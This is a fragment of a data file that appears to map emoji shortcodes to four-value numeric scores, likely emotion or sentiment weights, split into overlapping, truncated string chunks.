0.145], \":game_die:\": [0.126, 0.162, 0.09, 0.179],", "\":four_leaf_clover:\": [0.17, 0.16, 0.324, 0.156], \":wrapped_gift:\": [0.076, 0.188, 0.326, 0.057999999999999996], \":face_without_mouth:\": [0.34, 0.335,", "0.268, 0.11900000000000001, 0.295], \":index_pointing_up:\": [0.254, 0.233, 0.49200000000000005, 0.36], \":chart_increasing_with_yen:\": [0.175, 0.248, 0.305, 0.20800000000000002],", "0.218], \":ferris_wheel:\": [0.092, 0.168, 0.141, 0.156], \":e-mail:\": [0.26, 0.225, 0.21, 0.24], \":black_medium-small_square:\": [0.392,", "0.26899999999999996, 0.14800000000000002, 0.29], \":television:\": [0.322, 0.247, 0.22699999999999998, 0.222], \":face_blowing_a_kiss:\": [0.233, 0.022000000000000002, 0.215, 0.14400000000000002],", "0.24100000000000002, 0.213], \":video_camera:\": [0.301, 0.29, 0.235, 0.20199999999999999], \":green_apple:\": [0.16, 0.188, 0.405, 0.102], \":bust_in_silhouette:\":", "0.22699999999999998], \":closed_umbrella:\": [0.136, 
0.20199999999999999, 0.201, 0.295], \":waving_hand:\": [0.256, 0.252, 0.146, 0.19899999999999998], \":rice_cracker:\": [0.24100000000000002,", "0.145, 0.25], \":hourglass_not_done:\": [0.19699999999999998, 0.31, 0.266, 0.25], \":sun_behind_cloud:\": [0.11199999999999999, 0.27899999999999997, 0.345, 0.252], \":balloon:\":", "0.214], \":kiss_mark:\": [0.272, 0.10800000000000001, 0.273, 0.16699999999999998], \":large_orange_diamond:\": [0.33, 0.21100000000000002, 0.223, 0.335], \":hushed_face:\": [0.314,", "0.149, 0.192], \":camera:\": [0.198, 0.29600000000000004, 0.287, 0.19699999999999998], \":small_orange_diamond:\": [0.258, 0.162, 0.23399999999999999, 0.271], \":map_of_Japan:\":", "\":white_large_square:\": [0.348, 0.19399999999999998, 0.155, 0.22899999999999998], \":sparkler:\": [0.10300000000000001, 0.209, 0.221, 0.20600000000000002], \":fish:\": [0.131, 0.16699999999999998,", "0.302, 0.239], \":crystal_ball:\": [0.16899999999999998, 0.22, 0.354, 0.196], \":moon_viewing_ceremony:\": [0.149, 0.14300000000000002, 0.43700000000000006, 0.231], \":tropical_fish:\":", "0.179, 0.242], \":goblin:\": [0.42, 0.35, 0.149, 0.301], \":person_getting_haircut:\": [0.237, 0.215, 0.266, 0.153], \":Cancer:\":", "\":OK_hand:\": [0.153, 0.21, 0.20600000000000002, 0.16], \":man_and_woman_holding_hands:\": [0.075, 0.096, 0.266, 0.131], \":part_alternation_mark:\": [0.203, 0.12300000000000001,", "0.139, 0.129], \":Aries:\": [0.214, 0.212, 0.284, 0.196], \":meat_on_bone:\": [0.177, 0.218, 0.213, 0.106], \":round_pushpin:\":", "0.16899999999999998, 0.078], \":curry_rice:\": [0.161, 0.172, 0.175, 0.145], \":school_backpack:\": [0.127, 0.154, 0.174, 0.094], \":diamond_with_a_dot:\":", "0.245, 0.243], \":ice_cream:\": [0.228, 0.18899999999999997, 0.23199999999999998, 0.114], \":bento_box:\": [0.136, 0.16, 0.159, 0.212], \":woman’s_clothes:\":", "0.253, 0.268], \":bowling:\": [0.07400000000000001, 0.165, 0.073, 0.275], \":oncoming_fist:\": [0.23600000000000002, 0.253, 0.13, 0.273], 
\":nail_polish:\":", "0.254, 0.23600000000000002], \":up_arrow:\": [0.382, 0.293, 0.21899999999999997, 0.284], \":teacup_without_handle:\": [0.156, 0.237, 0.429, 0.07], \":page_with_curl:\":", "0.22], \":ticket:\": [0.10800000000000001, 0.08199999999999999, 0.10099999999999999, 0.327], \":vibration_mode:\": [0.075, 0.17600000000000002, 0.083, 0.134], \":person_gesturing_OK:\": [0.155,", "0.201, 0.017, 0.10800000000000001], \":telephone_receiver:\": [0.179, 0.16699999999999998, 0.10099999999999999, 0.311], \":club_suit:\": [0.188, 0.228, 0.128, 0.248],", "\":cherries:\": [0.171, 0.139, 0.155, 0.087], \":electric_plug:\": [0.124, 0.14, 0.078, 0.139], \":cloud:\": [0.18, 0.231,", "\":sleeping_face:\": [0.266, 0.23399999999999999, 0.33, 0.255], \":red_paper_lantern:\": [0.111, 0.235, 0.225, 0.163], \":ribbon:\": [0.20199999999999999, 0.203,", "0.276, 0.175, 0.17800000000000002], \":blue_circle:\": [0.203, 0.24100000000000002, 0.11699999999999999, 0.336], \":face_with_tears_of_joy:\": [0.381, 0.231, 0.099, 0.326],", "0.289, 0.503, 0.16899999999999998], \":snowman_without_snow:\": [0.11900000000000001, 0.203, 0.128, 0.278], \":OK_hand:\": [0.153, 0.21, 0.20600000000000002, 0.16],", "0.141, 0.22], \":department_store:\": [0.081, 0.231, 0.19899999999999998, 0.18], \":man_with_Chinese_cap:\": [0.255, 0.262, 0.126, 0.17600000000000002], \":kiss:\":", "\":sun:\": [0.11, 0.251, 0.267, 0.18], \":rose:\": [0.129, 0.161, 0.33399999999999996, 0.19899999999999998], \":bread:\": [0.142, 0.205,", "0.196, 0.249, 0.212], \":red_triangle_pointed_down:\": [0.304, 0.242, 0.207, 0.185], \":pine_decoration:\": [0.115, 0.271, 0.336, 0.17],", "0.355, 0.149], \":cookie:\": [0.11699999999999999, 0.18, 0.168, 0.1], \":running_shirt:\": [0.138, 0.081, 0.20199999999999999, 0.203], \":heart_decoration:\":", "0.293], \":Libra:\": [0.14400000000000002, 0.193, 0.275, 0.161], \":watermelon:\": [0.152, 0.14300000000000002, 0.133, 0.071], \":glasses:\": [0.157,", "0.253, 0.244, 0.12300000000000001], 
\":red_circle:\": [0.244, 0.22, 0.11199999999999999, 0.27899999999999997], \":eggplant:\": [0.353, 0.23399999999999999, 0.17800000000000002, 0.165],", "0.24600000000000002, 0.21], \":disappointed_face:\": [0.318, 0.467, 0.131, 0.39399999999999996], \":fireworks:\": [0.051, 0.165, 0.191, 0.165], \":tongue:\":", "0.105, 0.34], \":fast-forward_button:\": [0.327, 0.322, 0.17, 0.265], \":office_building:\": [0.18100000000000002, 0.359, 0.22, 0.19], \":radio:\":", "0.062, 0.136, 0.133], \":videocassette:\": [0.213, 0.25, 0.312, 0.20800000000000002], \":eight_o’clock:\": [0.11800000000000001, 0.341, 0.222, 0.24600000000000002],", "\":heart_suit:\": [0.165, 0.12300000000000001, 0.336, 0.193], \":trident_emblem:\": [0.228, 0.14400000000000002, 0.21899999999999997, 0.257], \":five_o’clock:\": [0.126, 0.335,", "[0.34299999999999997, 0.439, 0.134, 0.35200000000000004], \":tropical_drink:\": [0.14400000000000002, 0.17800000000000002, 0.159, 0.11900000000000001], \":baby:\": [0.266, 0.201, 0.457,", "\":chocolate_bar:\": [0.147, 0.11699999999999999, 0.152, 0.10800000000000001], \":candy:\": [0.192, 0.184, 0.188, 0.12], \":Leo:\": [0.24100000000000002, 0.221,", "0.276, 0.215], \":calendar:\": [0.174, 0.21, 0.131, 0.225], \":frowning_face_with_open_mouth:\": [0.37, 0.423, 0.128, 0.355], \":alarm_clock:\":", "\":bridge_at_night:\": [0.079, 0.151, 0.24, 0.247], \":briefcase:\": [0.17300000000000001, 0.192, 0.28600000000000003, 0.175], \":musical_notes:\": [0.149, 0.131,", "0.107, 0.212], \":shortcake:\": [0.126, 0.196, 0.166, 0.08900000000000001], \":dragon_face:\": [0.198, 0.298, 0.205, 0.157], \":END_arrow:\":", "0.214], \":alien:\": [0.15, 0.231, 0.155, 0.152], \":name_badge:\": [0.26899999999999996, 0.25, 0.147, 0.201], \":sheaf_of_rice:\": [0.188,", "0.22], \":fuel_pump:\": [0.375, 0.161, 0.138, 0.185], \":ear_of_corn:\": [0.141, 0.156, 0.182, 0.16699999999999998], \":pot_of_food:\": [0.18,", "0.233, 0.331, 0.21100000000000002], \":persevering_face:\": [0.327, 0.516, 0.175, 
0.41600000000000004], \":down-left_arrow:\": [0.13699999999999998, 0.171, 0.151, 0.12],", "[0.191, 0.215, 0.38, 0.134], \":person_swimming:\": [0.175, 0.159, 0.086, 0.245], \":ogre:\": [0.37, 0.419, 0.109,", "0.243, 0.213, 0.142], \":clutch_bag:\": [0.12300000000000001, 0.17, 0.253, 0.31], \":hundred_points:\": [0.254, 0.147, 0.145, 0.12300000000000001],", "0.42700000000000005, 0.215], \":pouting_face:\": [0.46799999999999997, 0.36200000000000004, 0.07400000000000001, 0.401], \":fish_cake_with_swirl:\": [0.10800000000000001, 0.21600000000000003, 0.355, 0.149], \":cookie:\":", "\":alien_monster:\": [0.128, 0.228, 0.087, 0.19699999999999998], \":file_folder:\": [0.151, 0.217, 0.158, 0.205], \":megaphone:\": [0.239, 0.214,", "0.28600000000000003, 0.175], \":musical_notes:\": [0.149, 0.131, 0.326, 0.31], \":open_file_folder:\": [0.213, 0.263, 0.171, 0.276], \":input_latin_lowercase:\":", "[0.179, 0.08, 0.217, 0.168], \":front-facing_baby_chick:\": [0.135, 0.147, 0.152, 0.151], \":barber_pole:\": [0.135, 0.163, 0.174,", "0.23199999999999998, 0.228], \":ear:\": [0.299, 0.33, 0.316, 0.35700000000000004], \":dvd:\": [0.184, 0.14300000000000002, 0.319, 0.307], \":up-right_arrow:\":", "[0.18600000000000003, 0.21600000000000003, 0.168, 0.152], \":dress:\": [0.183, 0.16, 0.292, 0.242], \":blond-haired_person:\": [0.257, 0.23, 0.226,", "\":nose:\": [0.38299999999999995, 0.272, 0.18600000000000003, 0.52], \":closed_book:\": [0.19899999999999998, 0.162, 0.256, 0.16], \":basketball:\": [0.171, 0.209,", "\":open_book:\": [0.196, 0.207, 0.259, 0.243], \":clockwise_vertical_arrows:\": [0.22899999999999998, 0.23399999999999999, 0.23, 0.262], \":green_book:\": [0.154, 0.24,", "0.262, 0.299], \":tennis:\": [0.174, 0.198, 0.174, 0.327], \":sleeping_face:\": [0.266, 0.23399999999999999, 0.33, 0.255], \":red_paper_lantern:\":", "0.11199999999999999], \":down-right_arrow:\": [0.23, 0.242, 0.10300000000000001, 0.175], \":wedding:\": [0.092, 0.139, 0.631, 0.252], \":money_bag:\": [0.185,", 
"0.18600000000000003, 0.235], \":peach:\": [0.344, 0.204, 0.128, 0.11900000000000001], \":roller_coaster:\": [0.065, 0.133, 0.111, 0.18899999999999997], \":trumpet:\":", "0.342, 0.151, 0.446], \":large_blue_diamond:\": [0.249, 0.053, 0.23600000000000002, 0.278], \":Statue_of_Liberty:\": [0.09, 0.226, 0.113, 0.18600000000000003],", "[0.27399999999999997, 0.27699999999999997, 0.207, 0.276], \":fried_shrimp:\": [0.138, 0.15, 0.191, 0.165], \":bell:\": [0.27, 0.21899999999999997, 0.242,", "0.133, 0.12300000000000001], \":construction_worker:\": [0.204, 0.298, 0.24100000000000002, 0.19699999999999998], \":person_bowing:\": [0.256, 0.331, 0.262, 0.299], \":tennis:\":", "0.242], \":goblin:\": [0.42, 0.35, 0.149, 0.301], \":person_getting_haircut:\": [0.237, 0.215, 0.266, 0.153], \":Cancer:\": [0.209,", "\":angry_face:\": [0.493, 0.375, 0.07400000000000001, 0.44299999999999995], \":Aquarius:\": [0.17800000000000002, 0.306, 0.23199999999999998, 0.228], \":ear:\": [0.299, 0.33,", "0.19699999999999998, 0.31, 0.13], \":heart_with_ribbon:\": [0.106, 0.172, 0.41700000000000004, 0.14400000000000002], \":bikini:\": [0.13, 0.132, 0.177, 0.187],", "0.087], \":electric_plug:\": [0.124, 0.14, 0.078, 0.139], \":cloud:\": [0.18, 0.231, 0.266, 0.295], \":watch:\": [0.183,", "\":tongue:\": [0.316, 0.062, 0.136, 0.133], \":videocassette:\": [0.213, 0.25, 0.312, 0.20800000000000002], \":eight_o’clock:\": [0.11800000000000001, 0.341,", "0.17600000000000002], \":skis:\": [0.10300000000000001, 0.077, 0.051, 0.192], \":clapping_hands:\": [0.21899999999999997, 0.256, 0.18899999999999997, 0.214], \":kiss_mark:\": [0.272,", "0.235, 0.20199999999999999], \":green_apple:\": [0.16, 0.188, 0.405, 0.102], \":bust_in_silhouette:\": [0.294, 0.34700000000000003, 0.18600000000000003, 0.27899999999999997], \":woman_dancing:\":", "0.228], \":Taurus:\": [0.22, 0.2, 0.257, 0.253], \":right_arrow_curving_down:\": [0.257, 0.276, 0.287, 0.245], \":roasted_sweet_potato:\": [0.191,", "0.262], \":green_book:\": 
[0.154, 0.24, 0.391, 0.107], \":SOON_arrow:\": [0.12300000000000001, 0.179, 0.191, 0.302], \":cooking:\": [0.078,", "0.336, 0.17], \":grinning_cat_face:\": [0.149, 0.192, 0.145, 0.25], \":hourglass_not_done:\": [0.19699999999999998, 0.31, 0.266, 0.25], \":sun_behind_cloud:\":", "0.268, 0.153], \":spiral_shell:\": [0.106, 0.301, 0.316, 0.174], \":backhand_index_pointing_right:\": [0.19699999999999998, 0.258, 0.249, 0.258], \":handbag:\":", "[0.11699999999999999, 0.18, 0.168, 0.1], \":running_shirt:\": [0.138, 0.081, 0.20199999999999999, 0.203], \":heart_decoration:\": [0.13699999999999998, 0.046, 0.315,", "0.21899999999999997, 0.139], \":worried_face:\": [0.349, 0.397, 0.09699999999999999, 0.348], \":foggy:\": [0.162, 0.301, 0.317, 0.28300000000000003], \":turtle:\":", "0.201], \":birthday_cake:\": [0.055, 0.185, 0.317, 0.122], \":carousel_horse:\": [0.11900000000000001, 0.128, 0.125, 0.17300000000000001], \":cinema:\": [0.273,", "\":red_apple:\": [0.251, 0.182, 0.195, 0.121], \":pistol:\": [0.259, 0.38799999999999996, 0.081, 0.128], \":Japanese_secret_button:\": [0.19699999999999998, 0.2,", "\":palm_tree:\": [0.035, 0.34299999999999997, 0.129, 0.23800000000000002], \":honeybee:\": [0.381, 0.285, 0.128, 0.111], \":rabbit_face:\": [0.165, 0.222,", "[0.105, 0.18899999999999997, 0.247, 0.151], \":pineapple:\": [0.11699999999999999, 0.19399999999999998, 0.133, 0.12300000000000001], \":construction_worker:\": [0.204, 0.298, 0.24100000000000002,", "[0.316, 0.062, 0.136, 0.133], \":videocassette:\": [0.213, 0.25, 0.312, 0.20800000000000002], \":eight_o’clock:\": [0.11800000000000001, 0.341, 0.222,", "0.22699999999999998], \":sake:\": [0.145, 0.255, 0.282, 0.145], \":game_die:\": [0.126, 0.162, 0.09, 0.179], \":person_pouting:\": [0.293,", "0.447], \":custard:\": [0.16399999999999998, 0.17600000000000002, 0.158, 0.131], \":cocktail_glass:\": [0.032, 0.14300000000000002, 0.146, 0.046], \":Japanese_dolls:\": [0.053,", "0.28], \":moai:\": [0.131, 0.153, 0.11800000000000001, 
0.095], \":wolf_face:\": [0.185, 0.289, 0.083, 0.172], \":laptop_computer:\": [0.127,", "0.41100000000000003], \":Santa_Claus:\": [0.131, 0.226, 0.254, 0.166], \":fast_reverse_button:\": [0.301, 0.233, 0.18899999999999997, 0.282], \":violin:\": [0.17600000000000002,", "[0.301, 0.233, 0.18899999999999997, 0.282], \":violin:\": [0.17600000000000002, 0.139, 0.298, 0.22399999999999998], \":beating_heart:\": [0.171, 0.078, 0.32299999999999995,", "0.41100000000000003, 0.138, 0.327], \":grinning_squinting_face:\": [0.165, 0.21600000000000003, 0.11900000000000001, 0.188], \":white_circle:\": [0.22, 0.16399999999999998, 0.121, 0.217],", "0.214], \":black_large_square:\": [0.396, 0.159, 0.222, 0.263], \":first_quarter_moon:\": [0.24100000000000002, 0.233, 0.265, 0.284], \":eyes:\": [0.272,", "0.121], \":frog_face:\": [0.408, 0.29100000000000004, 0.19699999999999998, 0.16699999999999998], \":flashlight:\": [0.07400000000000001, 0.19699999999999998, 0.14300000000000002, 0.131], \":downcast_face_with_sweat:\": [0.321,", "0.18899999999999997, 0.16699999999999998, 0.23], \":flexed_biceps:\": [0.225, 0.251, 0.231, 0.204], \":down_arrow:\": [0.33899999999999997, 0.268, 0.142, 0.252],", "[0.16399999999999998, 0.154, 0.14, 0.177], \":soft_ice_cream:\": [0.156, 0.18100000000000002, 0.141, 0.09], \":Japanese_post_office:\": [0.19, 0.309, 0.226,", "[0.165, 0.157, 0.239, 0.11599999999999999], \":maple_leaf:\": [0.27899999999999997, 0.172, 0.20800000000000002, 0.147], \":musical_keyboard:\": [0.132, 0.10800000000000001, 0.34,", "\":purple_heart:\": [0.183, 0.131, 0.341, 0.207], \":mobile_phone_off:\": [0.17600000000000002, 0.247, 0.146, 0.245], \":up-down_arrow:\": [0.27399999999999997, 0.27699999999999997,", "0.23], \":man:\": [0.243, 0.131, 0.29100000000000004, 0.098], \":ghost:\": [0.147, 0.201, 0.017, 0.10800000000000001], \":telephone_receiver:\": [0.179,", "\":large_blue_diamond:\": [0.249, 0.053, 0.23600000000000002, 0.278], \":Statue_of_Liberty:\": [0.09, 0.226, 0.113, 
0.18600000000000003], \":black_medium_square:\": [0.445, 0.245,", "\":red_triangle_pointed_down:\": [0.304, 0.242, 0.207, 0.185], \":pine_decoration:\": [0.115, 0.271, 0.336, 0.17], \":grinning_cat_face:\": [0.149, 0.192,", "[0.151, 0.067, 0.348, 0.13], \":smiling_face_with_heart-eyes:\": [0.307, 0.18, 0.308, 0.13699999999999998], \":kissing_face:\": [0.215, 0.171, 0.159,", "\":Santa_Claus:\": [0.131, 0.226, 0.254, 0.166], \":fast_reverse_button:\": [0.301, 0.233, 0.18899999999999997, 0.282], \":violin:\": [0.17600000000000002, 0.139,", "\":kissing_face_with_smiling_eyes:\": [0.203, 0.126, 0.256, 0.138], \":woman’s_hat:\": [0.175, 0.17, 0.281, 0.151], \":ON!_arrow:\": [0.126, 0.139,", "[0.11199999999999999, 0.27899999999999997, 0.345, 0.252], \":balloon:\": [0.042, 0.128, 0.102, 0.077], \":family:\": [0.249, 0.132, 0.418,", "0.282], \":crescent_moon:\": [0.098, 0.13699999999999998, 0.287, 0.218], \":ferris_wheel:\": [0.092, 0.168, 0.141, 0.156], \":e-mail:\": [0.26,", "0.20800000000000002, 0.127, 0.226], \":house_with_garden:\": [0.115, 0.24, 0.268, 0.153], \":spiral_shell:\": [0.106, 0.301, 0.316, 0.174],", "0.35100000000000003], \":musical_note:\": [0.26, 0.191, 0.341, 0.32799999999999996], \":monkey:\": [0.179, 0.379, 0.083, 0.032], \":mouse_face:\": [0.18899999999999997,", "0.23399999999999999, 0.23, 0.262], \":green_book:\": [0.154, 0.24, 0.391, 0.107], \":SOON_arrow:\": [0.12300000000000001, 0.179, 0.191, 0.302],", "0.179, 0.135, 0.171], \":radio_button:\": [0.218, 0.209, 0.158, 0.261], \":clipboard:\": [0.157, 0.233, 0.331, 0.21100000000000002],", "0.083, 0.078, 0.121], \":tomato:\": [0.284, 0.22, 0.294, 0.23600000000000002], \":blue_book:\": [0.156, 0.191, 0.149, 0.193],", "0.271, 0.166], \":open_hands:\": [0.203, 0.18899999999999997, 0.16699999999999998, 0.23], \":flexed_biceps:\": [0.225, 0.251, 0.231, 0.204], \":down_arrow:\":", "[0.163, 0.17300000000000001, 0.171, 0.18600000000000003], \":girl:\": [0.22699999999999998, 0.16, 0.214, 0.146], 
\":pushpin:\": [0.299, 0.263, 0.136,", "0.09, 0.179], \":person_pouting:\": [0.293, 0.244, 0.196, 0.299], \":sunrise_over_mountains:\": [0.10300000000000001, 0.28, 0.392, 0.205], \":tangerine:\":", "0.233, 0.18899999999999997, 0.282], \":violin:\": [0.17600000000000002, 0.139, 0.298, 0.22399999999999998], \":beating_heart:\": [0.171, 0.078, 0.32299999999999995, 0.157],", "[0.147, 0.201, 0.017, 0.10800000000000001], \":telephone_receiver:\": [0.179, 0.16699999999999998, 0.10099999999999999, 0.311], \":club_suit:\": [0.188, 0.228, 0.128,", "0.29, 0.235, 0.20199999999999999], \":green_apple:\": [0.16, 0.188, 0.405, 0.102], \":bust_in_silhouette:\": [0.294, 0.34700000000000003, 0.18600000000000003, 0.27899999999999997],", "0.252], \":balloon:\": [0.042, 0.128, 0.102, 0.077], \":family:\": [0.249, 0.132, 0.418, 0.215], \":exclamation_question_mark:\": [0.188,", "\":speech_balloon:\": [0.233, 0.302, 0.22699999999999998, 0.214], \":alien:\": [0.15, 0.231, 0.155, 0.152], \":name_badge:\": [0.26899999999999996, 0.25,", "0.36700000000000005, 0.19699999999999998, 0.331], \":rice_ball:\": [0.10300000000000001, 0.254, 0.092, 0.262], \":memo:\": [0.147, 0.235, 0.26899999999999996, 0.203],", "[0.10800000000000001, 0.21600000000000003, 0.355, 0.149], \":cookie:\": [0.11699999999999999, 0.18, 0.168, 0.1], \":running_shirt:\": [0.138, 0.081, 0.20199999999999999,", "[0.218, 0.209, 0.158, 0.261], \":clipboard:\": [0.157, 0.233, 0.331, 0.21100000000000002], \":persevering_face:\": [0.327, 0.516, 0.175,", "0.257, 0.084], \":no_one_under_eighteen:\": [0.109, 0.136, 0.051, 0.179], \":left-right_arrow:\": [0.32899999999999996, 0.37200000000000005, 0.214, 0.335], \":smiling_cat_face_with_heart-eyes:\":", "0.258], \":handbag:\": [0.099, 0.154, 0.223, 0.293], \":Libra:\": [0.14400000000000002, 0.193, 0.275, 0.161], \":watermelon:\": [0.152,", "[0.34600000000000003, 0.374, 0.145, 0.42100000000000004], \":smiling_face:\": [0.095, 0.13, 0.245, 0.17600000000000002], \":skis:\": 
[0.10300000000000001, 0.077, 0.051,", "\":baseball:\": [0.14300000000000002, 0.242, 0.099, 0.369], \":honey_pot:\": [0.177, 0.18100000000000002, 0.264, 0.14300000000000002], \":credit_card:\": [0.14400000000000002, 0.08900000000000001,", "\":wheelchair_symbol:\": [0.18, 0.179, 0.09300000000000001, 0.264], \":Ophiuchus:\": [0.213, 0.17, 0.233, 0.228], \":elephant:\": [0.22399999999999998, 0.23399999999999999,", "0.276, 0.292], \":seat:\": [0.155, 0.24, 0.067, 0.13699999999999998], \":reverse_button:\": [0.256, 0.262, 0.114, 0.29600000000000004], \":heart_suit:\":", "\":white_medium_star:\": [0.237, 0.175, 0.29, 0.16], \":dashing_away:\": [0.363, 0.18, 0.102, 0.16399999999999998], \":Virgo:\": [0.17, 0.109,", "0.16899999999999998, 0.231], \":flag_in_hole:\": [0.134, 0.207, 0.222, 0.175], \":person_running:\": [0.162, 0.297, 0.062, 0.2], \":fast_down_button:\":", "\":tired_face:\": [0.264, 0.376, 0.155, 0.303], \":red_apple:\": [0.251, 0.182, 0.195, 0.121], \":pistol:\": [0.259, 0.38799999999999996,", "\":cherry_blossom:\": [0.122, 0.19699999999999998, 0.31, 0.13], \":heart_with_ribbon:\": [0.106, 0.172, 0.41700000000000004, 0.14400000000000002], \":bikini:\": [0.13, 0.132,", "0.142, 0.252], \":snowboarder:\": [0.13699999999999998, 0.132, 0.028999999999999998, 0.20600000000000002], \":collision:\": [0.16899999999999998, 0.16399999999999998, 0.048, 0.2], \":locked_with_pen:\":", "[0.203, 0.12300000000000001, 0.201, 0.305], \":magnifying_glass_tilted_right:\": [0.177, 0.253, 0.244, 0.12300000000000001], \":red_circle:\": [0.244, 0.22, 0.11199999999999999,", "0.179], \":postbox:\": [0.26899999999999996, 0.171, 0.21899999999999997, 0.175], \":one_o’clock:\": [0.14400000000000002, 0.341, 0.209, 0.198], \":kissing_cat_face:\": [0.18899999999999997,", "0.14300000000000002], \":books:\": [0.16699999999999998, 0.157, 0.35100000000000003, 0.141], \":milky_way:\": [0.16699999999999998, 0.201, 0.43700000000000006, 0.22], \":ticket:\": [0.10800000000000001,", "0.25], 
\":relieved_face:\": [0.127, 0.182, 0.254, 0.13699999999999998], \":grimacing_face:\": [0.161, 0.32799999999999996, 0.1, 0.21100000000000002], \":lollipop:\": [0.092,", "[0.13699999999999998, 0.17, 0.285, 0.081], \":chicken:\": [0.16899999999999998, 0.192, 0.218, 0.127], \":sparkling_heart:\": [0.217, 0.068, 0.42200000000000004,", "0.214, 0.18600000000000003, 0.124], \":joker:\": [0.233, 0.28600000000000003, 0.051, 0.177], \":dolphin:\": [0.107, 0.184, 0.11699999999999999, 0.204],", "0.177, 0.21600000000000003, 0.17], \":diamond_suit:\": [0.305, 0.17800000000000002, 0.226, 0.213], \":high-heeled_shoe:\": [0.278, 0.11900000000000001, 0.23199999999999998, 0.195],", "\":thumbs_up:\": [0.20199999999999999, 0.265, 0.264, 0.19399999999999998], \":woman:\": [0.24100000000000002, 0.215, 0.29, 0.142], \":two_hearts:\": [0.172, 0.08800000000000001,", "\":persevering_face:\": [0.327, 0.516, 0.175, 0.41600000000000004], \":down-left_arrow:\": [0.13699999999999998, 0.171, 0.151, 0.12], \":dango:\": [0.27899999999999997, 0.193,", "0.259, 0.243], \":clockwise_vertical_arrows:\": [0.22899999999999998, 0.23399999999999999, 0.23, 0.262], \":green_book:\": [0.154, 0.24, 0.391, 0.107], \":SOON_arrow:\":", "0.11900000000000001], \":roller_coaster:\": [0.065, 0.133, 0.111, 0.18899999999999997], \":trumpet:\": [0.128, 0.17800000000000002, 0.20600000000000002, 0.221], \":mouth:\": [0.245,", "0.20199999999999999, 0.203], \":heart_decoration:\": [0.13699999999999998, 0.046, 0.315, 0.141], \":scroll:\": [0.254, 0.267, 0.276, 0.235], \":TOP_arrow:\":", "[0.256, 0.262, 0.114, 0.29600000000000004], \":heart_suit:\": [0.165, 0.12300000000000001, 0.336, 0.193], \":trident_emblem:\": [0.228, 0.14400000000000002, 0.21899999999999997,", "\":circus_tent:\": [0.113, 0.196, 0.111, 0.204], \":monkey_face:\": [0.19399999999999998, 0.327, 0.079, 0.061], \":bookmark:\": [0.257, 0.174,", "0.21899999999999997, 0.175], \":one_o’clock:\": [0.14400000000000002, 0.341, 0.209, 0.198], \":kissing_cat_face:\": 
[0.18899999999999997, 0.11900000000000001, 0.215, 0.21], \":backhand_index_pointing_down:\":", "0.10800000000000001, 0.273, 0.16699999999999998], \":large_orange_diamond:\": [0.33, 0.21100000000000002, 0.223, 0.335], \":hushed_face:\": [0.314, 0.355, 0.13699999999999998, 0.353],", "0.131, 0.154], \":white_flower:\": [0.187, 0.141, 0.19, 0.14400000000000002], \":weary_cat_face:\": [0.251, 0.27, 0.095, 0.242], \":clinking_beer_mugs:\":", "0.027000000000000003, 0.14300000000000002], \":books:\": [0.16699999999999998, 0.157, 0.35100000000000003, 0.141], \":milky_way:\": [0.16699999999999998, 0.201, 0.43700000000000006, 0.22], \":ticket:\":", "\":full_moon:\": [0.17600000000000002, 0.284, 0.312, 0.20800000000000002], \":jack-o-lantern:\": [0.129, 0.327, 0.09, 0.092], \":wind_chime:\": [0.214, 0.17600000000000002,", "0.29600000000000004], \":fountain:\": [0.10099999999999999, 0.22899999999999998, 0.276, 0.292], \":seat:\": [0.155, 0.24, 0.067, 0.13699999999999998], \":reverse_button:\": [0.256,", "0.32799999999999996, 0.22899999999999998], \":face_with_tongue:\": [0.242, 0.19, 0.142, 0.14], \":hospital:\": [0.128, 0.376, 0.305, 0.184], \":zzz:\":", "\":squinting_face_with_tongue:\": [0.083, 0.14, 0.027000000000000003, 0.14300000000000002], \":books:\": [0.16699999999999998, 0.157, 0.35100000000000003, 0.141], \":milky_way:\": [0.16699999999999998, 0.201,", "\":Japanese_congratulations_button:\": [0.158, 0.162, 0.255, 0.19899999999999998], \":waxing_gibbous_moon:\": [0.18100000000000002, 0.245, 0.327, 0.221], \":penguin:\": [0.151, 0.188,", "0.297, 0.11900000000000001, 0.33299999999999996], \":bouquet:\": [0.09, 0.251, 0.326, 0.18100000000000002], \":page_facing_up:\": [0.196, 0.31, 0.3, 0.29],", "0.371, 0.315], \":white_square_button:\": [0.35100000000000003, 0.226, 0.225, 0.16699999999999998], \":angry_face:\": [0.493, 0.375, 0.07400000000000001, 0.44299999999999995], \":Aquarius:\":", "\":keycap_10:\": [0.217, 0.109, 0.086, 0.17300000000000001], 
\":kissing_face_with_closed_eyes:\": [0.179, 0.08, 0.217, 0.168], \":front-facing_baby_chick:\": [0.135, 0.147,", "[0.271, 0.19899999999999998, 0.15, 0.21600000000000003], \":convenience_store:\": [0.191, 0.17800000000000002, 0.17600000000000002, 0.17600000000000002], \":bird:\": [0.22, 0.243, 0.213,", "[0.131, 0.153, 0.11800000000000001, 0.095], \":wolf_face:\": [0.185, 0.289, 0.083, 0.172], \":laptop_computer:\": [0.127, 0.23399999999999999, 0.35,", "0.155, 0.225, 0.159], \":open_book:\": [0.196, 0.207, 0.259, 0.243], \":clockwise_vertical_arrows:\": [0.22899999999999998, 0.23399999999999999, 0.23, 0.262],", "0.171, 0.21899999999999997, 0.175], \":one_o’clock:\": [0.14400000000000002, 0.341, 0.209, 0.198], \":kissing_cat_face:\": [0.18899999999999997, 0.11900000000000001, 0.215, 0.21],", "0.142], \":spaghetti:\": [0.055999999999999994, 0.149, 0.149, 0.159], \":french_fries:\": [0.16399999999999998, 0.154, 0.14, 0.177], \":soft_ice_cream:\": [0.156,", "0.081, 0.128], \":Japanese_secret_button:\": [0.19699999999999998, 0.2, 0.221, 0.24], \":ATM_sign:\": [0.128, 0.179, 0.135, 0.171], \":radio_button:\":", "0.099], \":nine_o’clock:\": [0.15, 0.36700000000000005, 0.19699999999999998, 0.331], \":rice_ball:\": [0.10300000000000001, 0.254, 0.092, 0.262], \":memo:\": [0.147,", "0.282, 0.27], \":BACK_arrow:\": [0.075, 0.166, 0.062, 0.20199999999999999], \":winking_face_with_tongue:\": [0.126, 0.059000000000000004, 0.139, 0.129], \":Aries:\":", "0.19699999999999998, 0.16699999999999998], \":flashlight:\": [0.07400000000000001, 0.19699999999999998, 0.14300000000000002, 0.131], \":downcast_face_with_sweat:\": [0.321, 0.496, 0.17300000000000001, 0.447], \":custard:\":", "\":crossed_flags:\": [0.114, 0.048, 0.039, 0.207], \":input_latin_uppercase:\": [0.182, 0.175, 0.161, 0.182], \":kitchen_knife:\": [0.321, 0.449,", "\":dog_face:\": [0.13, 0.18, 0.257, 0.084], \":no_one_under_eighteen:\": [0.109, 0.136, 0.051, 0.179], \":left-right_arrow:\": [0.32899999999999996, 
